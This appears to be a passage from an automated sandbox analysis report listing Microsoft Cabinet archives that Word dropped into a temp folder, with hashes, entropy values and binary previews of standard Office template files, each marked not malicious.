                                                SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                Malicious:false
                                                Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                                C:\Users\user\AppData\Local\Temp\cabF07E.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):33610
                                                Entropy (8bit):7.8340762758330476
                                                Encrypted:false
                                                SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                MD5:51804E255C573176039F4D5B55C12AB2
                                                SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                Malicious:false
                                                Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~

                                                C:\Users\user\AppData\Local\Temp\cabF07F.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):28911
                                                Entropy (8bit):7.7784119983764715
                                                Encrypted:false
                                                SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                MD5:6D787B1E223DB6B91B69238062CCA872
                                                SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                Malicious:false
                                                Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                                C:\Users\user\AppData\Local\Temp\cabF080.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31008
                                                Entropy (8bit):7.806058951525675
                                                Encrypted:false
                                                SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                Malicious:false
                                                Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                                C:\Users\user\AppData\Local\Temp\cabF091.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):22149
                                                Entropy (8bit):7.659898883631361
                                                Encrypted:false
                                                SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                Malicious:false
                                                Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                                C:\Users\user\AppData\Local\Temp\cabF094.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):46413
                                                Entropy (8bit):7.9071408623961394
                                                Encrypted:false
                                                SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                Malicious:false
                                                Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                                C:\Users\user\AppData\Local\Temp\cabF0A5.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):23597
                                                Entropy (8bit):7.692965575678876
                                                Encrypted:false
                                                SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                MD5:7C645EC505982FE529D0E5035B378FFC
                                                SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                Malicious:false
                                                Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                                C:\Users\user\AppData\Local\Temp\cabF0A6.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):25314
                                                Entropy (8bit):7.729848360340861
                                                Encrypted:false
                                                SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                Malicious:false
                                                Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.

                                                C:\Users\user\AppData\Local\Temp\cabF0A7.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31083
                                                Entropy (8bit):7.814202819173796
                                                Encrypted:false
                                                SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                MD5:89A9818E6658D73A73B642522FF8701F
                                                SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                Malicious:false
                                                Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                                C:\Users\user\AppData\Local\Temp\cabF0B9.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):22594
                                                Entropy (8bit):7.674816892242868
                                                Encrypted:false
                                                SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                Malicious:false
                                                Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                                C:\Users\user\AppData\Local\Temp\cabF0BA.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):20554
                                                Entropy (8bit):7.612044504501488
                                                Encrypted:false
                                                SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                Malicious:false
                                                Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                                C:\Users\user\AppData\Local\Temp\cabF0BB.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):21111
                                                Entropy (8bit):7.6297992466897675
                                                Encrypted:false
                                                SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                Malicious:false
                                                Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                                C:\Users\user\AppData\Local\Temp\cabF0BC.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):21791
                                                Entropy (8bit):7.65837691872985
                                                Encrypted:false
                                                SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                MD5:7BF88B3CA20EB71ED453A3361908E010
                                                SHA1:F75F86557051160507397F653D7768836E3B5655
                                                SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                Malicious:false
                                                Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...

                                                C:\Users\user\AppData\Local\Temp\cabF0BD.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):32833
                                                Entropy (8bit):7.825460303519308
                                                Encrypted:false
                                                SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                MD5:205AF51604EF96EF1E8E60212541F742
                                                SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                Malicious:false
